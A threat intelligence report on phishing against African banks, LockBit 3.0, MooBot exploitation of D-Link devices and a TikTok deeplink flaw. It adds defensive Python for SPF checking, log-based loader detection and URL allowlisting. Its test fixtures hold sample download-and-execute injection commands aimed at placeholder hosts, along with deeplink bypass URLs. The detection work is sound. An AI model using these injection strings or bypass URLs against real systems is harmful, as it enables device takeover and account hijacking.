Weekly Intelligence Report – 11 Sep 2022

Threat Actor in Focus

DangerousSavanna Campaigns Targeting Financial Institutions in French-speaking Africa

  • Suspected Threat Actors: Unknown

  • Attack Type: Spear-phishing, Impersonation, Malware Implants, Data Exfiltration, Defence Evasion, Persistence, Reconnaissance
  • Objective: Financial Gains
  • Target Technology: Email, Microsoft Office documents, PDFs, ISO, LNK, JAR and VBE Files
  • Targeted Industry: Finance, Banking, Insurance
  • Target Geography: Multiple French-Speaking African Countries
  • Business Impact: Financial Loss, Data Loss, Reputational Damage, Regulatory Implication

Summary:
Researchers recently detailed “DangerousSavanna”, a financially motivated campaign that has been running for roughly two years against multiple major financial entities in French-speaking Africa. Its targets included organizations in Ivory Coast, Morocco, Cameroon, Senegal, and Togo. The threat actors use spear-phishing emails to distribute and deploy malware.

The initial infection starts with spear-phishing emails, written in French, sent to multiple employees of the target. In the early stages of the campaign the threat actors used Gmail and Hotmail accounts to send their phishing emails. To increase credibility, they later shifted to lookalike domains and impersonated financial institutions in Africa, including Tunisian Foreign Bank and Nedbank. More recently, researchers also observed spoofed sender addresses of a local insurance advisory company whose domain had no SPF record, so receiving mail servers had no basis on which to reject mail forged in its name. The phishing emails carry malicious attachments, including Word documents with macros, documents that pull remote templates, executables masquerading as PDFs, and, in 2022, a variety of other file types (ISO, LNK, JAR and VBE).
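The sender spoofing described above works because the impersonated domain publishes no SPF record, so a receiving MTA has nothing to evaluate. The following Python is an added example, not part of the original report: it evaluates a sending IP against a domain's SPF policy in the way a receiver would (a subset of RFC 7208: ip4, ip6, include and all), using constructed DNS data in place of live lookups. The domains, addresses and records are hypothetical; the point is the "none" verdict that makes a domain trivially spoofable, shown next to a correctly locked-down record and a record that is present but useless.

```python
import ipaddress

# Constructed, hypothetical TXT data standing in for real DNS lookups.
# The domains and addresses are made up for this example.
FAKE_TXT_RECORDS = {
    "bank.example": ["v=spf1 ip4:203.0.113.0/24 include:mail.example -all"],
    "mail.example": ["v=spf1 ip4:198.51.100.10 ~all"],
    "insurer.example": [],                # publishes no SPF record at all
    "sloppy.example": ["v=spf1 +all"],    # SPF present, but authorises every sender
}


def lookup_spf(domain, records=FAKE_TXT_RECORDS):
    """Return the single 'v=spf1' TXT record for a domain, or None if absent/ambiguous."""
    spf = [r for r in records.get(domain, []) if r.lower().startswith("v=spf1")]
    return spf[0] if len(spf) == 1 else None


def check_spf(sender_ip, domain, records=FAKE_TXT_RECORDS, depth=0):
    """Evaluate an SPF record for sender_ip claiming to send as @domain.

    Returns 'none' (no record), 'pass', 'fail', 'softfail', 'neutral' or 'permerror'.
    Mechanisms needing further DNS (a, mx, ptr, exists) are reported as 'permerror'
    here because this example runs offline.
    """
    if depth > 10:                        # RFC 7208 caps DNS-querying mechanisms at 10
        return "permerror"
    record = lookup_spf(domain, records)
    if record is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:       # skip the 'v=spf1' version tag
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        result = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}[qualifier]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            return result
        if mech in ("ip4", "ip6"):
            try:
                if ip in ipaddress.ip_network(arg, strict=False):
                    return result
            except ValueError:
                return "permerror"
        elif mech == "include":
            # 'include' matches only when the referenced domain's policy yields 'pass'.
            if check_spf(sender_ip, arg, records, depth + 1) == "pass":
                return result
        else:
            return "permerror"
    return "neutral"                      # no 'all' terminator: RFC default


def spoofable(domain, records=FAKE_TXT_RECORDS):
    """True when mail forged from an arbitrary IP would not be rejected on SPF grounds.

    'softfail' is treated as not spoofable here, although many receivers still deliver
    softfail mail; pair SPF with a DMARC 'reject' policy to close that gap.
    """
    verdict = check_spf("192.0.2.77", domain, records)   # arbitrary attacker IP
    return verdict in ("none", "pass", "neutral")
```

In practice the TXT lookup would be done with a DNS resolver and the record cached; the rest of the evaluation is the same. A domain that returns "none" here is exactly the situation the campaign abused, and "+all" is no better.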

The campaign relies on relatively unsophisticated tooling, both self-written and openly available, including Metasploit, PoshC2, and AsyncRAT. Researchers also observed the DWService remote access tool, Windows Subsystem for Linux (WSL), CrackMapExec, TITAN.exe (the open-source anti-EDR tool known as Backstab), and POPULAIRE.exe (a basic keylogger known as LoggerStamp).

Insights:

  • The campaign is said to have been active for almost two years, and within that time the attackers revised their approach, frequently changing tools and techniques to improve their success rate and evade detection. The campaign also shows the attackers’ familiarity with open-source tooling and penetration-testing software.
  • Given this, the attackers are unlikely to slow down or stop. They will most likely keep adjusting their operation and attack methods, as they have in the past, to maximize financial gain.

Updates on Lockbit Ransomware

The LockBit ransomware group recently released its LockBit 3.0 variant and made several changes to its dedicated leak site (DLS), including the introduction of a bug bounty program. The leak site now also displays what appears to be the ransom amount demanded from the victim alongside the familiar countdown timer. For some victims the demanded amount decreases as the timer approaches zero, and if no ransom is paid the exfiltrated data is leaked. The group has also added Zcash as a payment option. Researchers indicate that LockBit 3.0 appears to be derived from the BlackMatter ransomware (itself a rebrand of DarkSide), stating that “large portions of the code are ripped straight from BlackMatter/Darkside.”

Recently a public-facing LockBit figure announced that the group is exploring DDoS as a triple-extortion tactic, on top of encrypting and leaking exfiltrated data. The move came shortly after the group’s DLS went offline under a DDoS attack, which LockBit blamed on its latest victim at the time, a prominent software company. This is not new: other ransomware gangs have already used DDoS as a third lever to make victims meet their demands. A complicating factor is the recent attention around the politically motivated DDoS attacks of a couple of months ago, spearheaded by groups such as Killnet. Although the tangible effects of Killnet’s activity have been negligible, the popularity of DDoS as a way to hold organizations hostage, or to coerce agreement by threatening an attack, has risen. With LockBit being one of the most prominent players in the ransomware ecosystem, its adoption of the tactic would not only open a new line of business for DDoS providers in the cybercriminal underground but may also encourage other ransomware gangs to follow.

Latest Cyber-Attacks, Incidents, and Breaches

MooBot Targets D-Link Devices

  • Attack Type: Malware Implants, Vulnerability & Exploits, DDoS, RCE, OS command injection
  • Objective: Unauthorized Access, Payload Delivery
  • Target Technology: D-Link
  • Business Impact: Potential Data Loss, Potential Financial Loss

Summary:
Researchers report that attacks exploiting several vulnerabilities in D-Link devices were observed in early August. Compromised devices come under the attackers’ control and can be used in further attacks, including DDoS. The exploit attempts targeting these vulnerabilities were used to spread MooBot, a Mirai variant that targets exposed networking devices running Linux. Once they have a foothold on the device, the attackers use wget to download and deploy MooBot.

Following are the four known vulnerabilities being exploited in this attack (table not reproduced here; source: Surface Web).

Overview of the campaign (figure not reproduced here; source: Surface Web).

Insights:

  • The vulnerabilities being exploited in this attack have low attack complexity but critical security implications, since they lead to RCE. D-Link has published security advisories addressing all of the aforementioned vulnerabilities, but devices still running affected firmware versions remain at risk.
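The summary and the insight above describe OS command injection against web-exposed device endpoints, followed by a wget download of the bot. The following Python is an added example, not part of the original research: detection logic that scans web-server access-log lines for the Mirai-family loader pattern (a shell separator, a download tool, and a stage that makes the fetched file executable or runs it) and extracts the payload URLs for blocklisting. The log lines, client addresses, CGI paths and payload hosts are constructed for the example; the vulnerable D-Link endpoints themselves are not given on this page, so the paths here are placeholders to replace with those from the vendor advisory.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (hypothetical IPs, paths and payloads).
# Lines 2 to 4 imitate the download-and-execute chain typical of Mirai-family
# loaders; line 4 is double URL-encoded; lines 1 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.9 - - [03/Aug/2022:10:14:01 +0000] "GET /index.html HTTP/1.1" 200 612
198.51.100.23 - - [03/Aug/2022:10:14:07 +0000] "GET /cgi-bin/example.cgi?cmd=1%3Bwget%20http%3A%2F%2F192.0.2.50%2Fbins%2Farm7%20-O%20%2Ftmp%2Fx%3Bchmod%20777%20%2Ftmp%2Fx%3B%2Ftmp%2Fx HTTP/1.1" 200 0
198.51.100.23 - - [03/Aug/2022:10:14:09 +0000] "GET /cgi-bin/example.cgi?host=127.0.0.1%7Ccurl%20http%3A%2F%2F192.0.2.50%2Fmips%7Csh HTTP/1.1" 200 0
198.51.100.77 - - [03/Aug/2022:10:14:30 +0000] "GET /cgi-bin/example.cgi?ip=1%253Bwget%2520http%253A%252F%252F192.0.2.51%252Fx%253Bsh%2520x HTTP/1.1" 200 0
203.0.113.40 - - [03/Aug/2022:10:15:00 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 2048
"""

# Common/combined log format: client, identity, user, [timestamp], "request", status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
SHELL_SEPARATOR = re.compile(r"[;|`]|&&|\$\(")
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# chmod, execution of a file in a writable directory, or piping into / invoking sh
EXEC_STAGE = re.compile(
    r"\bchmod\b|(^|[;|&\s])(\./|/tmp/|/var/tmp/|/dev/shm/)|\|\s*sh\b|\bsh\s+\S"
)
PAYLOAD_URL = re.compile(r"https?://[^\s;|&'\"<>]+")


def decode_target(target):
    """URL-decode the request target twice: double encoding is a common filter bypass."""
    return unquote_plus(unquote_plus(target))


def analyse_line(line):
    """Return a finding dict for a line showing all three loader indicators, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    indicators = []
    if SHELL_SEPARATOR.search(decoded):
        indicators.append("shell-separator")
    if DOWNLOADER.search(decoded):
        indicators.append("downloader")
    if EXEC_STAGE.search(decoded):
        indicators.append("exec-stage")
    # Requiring all three keeps an innocent search for "wget manual" out of the alerts.
    if len(indicators) < 3:
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "target": decoded,
        "indicators": indicators,
        "payload_urls": PAYLOAD_URL.findall(decoded),
    }


def scan_log(text):
    """Scan a whole log body and return the list of findings in file order."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


def payload_hosts(findings):
    """Distinct hosts serving bot binaries, for blocklisting or hunting in proxy/DNS logs."""
    return sorted({urlsplit(u).hostname for f in findings for u in f["payload_urls"]})


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["indicators"], finding["payload_urls"])
    print("payload hosts:", payload_hosts(scan_log(SAMPLE_LOG)))
```

The three-indicator rule trades a little recall for precision; a reconnaissance probe that only injects a separator and `id` would be missed, so a lower-confidence rule for separator plus downloader alone is worth running alongside it. On the device side, the durable fix remains the firmware update from the vendor advisory and keeping the management interface off the internet.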

Vulnerabilities and Exploits

‘One-Click’ Exploit for TikTok Android App

  • Attack Type: Vulnerabilities & Exploits, Account Hijacking
  • Target Technology: TikTok Android Application
  • Target Industry: Social Media
  • Target Geography: Global (Except India)
  • Vulnerability: CVE-2022-28799 (CVSS Score:8.8)
  • Vulnerability Type: Direct Request (‘Forced Browsing’)
  • Impact: Confidentiality (High), Integrity (High), Availability (High)

Summary:
Researchers disclosed a now-patched high-severity vulnerability in the TikTok Android app that could allow attackers to take over accounts. According to the researchers, a single click on a specially crafted link could hijack the account without the user’s awareness. Upon successful exploitation, attackers could access and modify the user’s TikTok profile and sensitive information, including private videos. The bug could also have been used to send messages and upload videos on the victim’s behalf.

Insights:

  • The bug affects two variants of TikTok’s Android app: com.ss.android.ugc.trill, distributed to users in East and Southeast Asia, and com.zhiliaoapp.musically, used by the rest of the world except India, where the app remains banned. Together the two apps have more than 1.5 billion installations.
  • The bug exists because of the way the apps handled deeplinks, special hyperlinks that, on Android, load a specific resource inside another installed app. According to the researchers, a crafted URL (an unvalidated deeplink) could force the WebView of a vulnerable version of the app to load an arbitrary website.
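The insight above comes down to a WebView being handed a URL from a deeplink without a strict check on where it points. The following Python is an added example, not taken from the research or from the app’s code: it puts the kind of host check that goes wrong (matching the trusted domain as a substring of the raw string) next to a strict allowlist check on the parsed scheme and host, and runs both over the usual bypass shapes. The trusted hosts and the test URLs are hypothetical, and this page does not say which check the vulnerable app used; the logic carries over unchanged to the Java or Kotlin that would inspect an Android Intent’s data URI before calling WebView.loadUrl.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the app's own WebView may be pointed at.
TRUSTED_HOSTS = {"www.trusted.example", "m.trusted.example"}


def vulnerable_is_trusted(url):
    """Naive check: is the trusted domain anywhere in the raw string?

    Every entry in BYPASS_ATTEMPTS below satisfies this while loading an
    attacker-controlled page (or no page at all, for a javascript: URL).
    """
    return any(host in url for host in TRUSTED_HOSTS)


def hardened_is_trusted(url):
    """Strict check: parse first, then compare scheme and exact host to the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":                    # rejects javascript:, intent:, file:, http:
        return False
    if not parts.hostname or parts.hostname not in TRUSTED_HOSTS:
        return False                               # subdomain-of-attacker and user@host forms fail here
    if parts.username is not None or parts.password is not None:
        return False                               # belt and braces: no userinfo at all
    return True


def resolve_deeplink(url):
    """Return the URL the WebView may load, or None so the caller falls back to a safe default."""
    return url if hardened_is_trusted(url) else None


# Constructed inputs: each one contains the trusted host name but does not go there.
BYPASS_ATTEMPTS = [
    "https://www.trusted.example.attacker.example/",          # trusted name as a subdomain label
    "https://www.trusted.example@attacker.example/",          # trusted name as userinfo
    "https://attacker.example/?next=https://www.trusted.example/",  # trusted name in the query
    "https://attacker.example/#www.trusted.example",          # trusted name in the fragment
    "javascript:alert(document.cookie)//www.trusted.example",  # script scheme, not a site at all
    "http://www.trusted.example/",                            # right host, downgraded scheme
]

if __name__ == "__main__":
    for attempt in BYPASS_ATTEMPTS:
        print(f"{attempt:65} naive={vulnerable_is_trusted(attempt)!s:5} strict={hardened_is_trusted(attempt)}")
```

One caveat when porting this to Android: validate with the same parser whose result is handed to the WebView (android.net.Uri, not a regex over the string), because disagreements between two parsers about where the host ends are themselves a bypass. An allowlist match is also only half the fix; the page does not go into it, but a WebView that exposes JavaScript bridges to native code should expose them only to pages it controls.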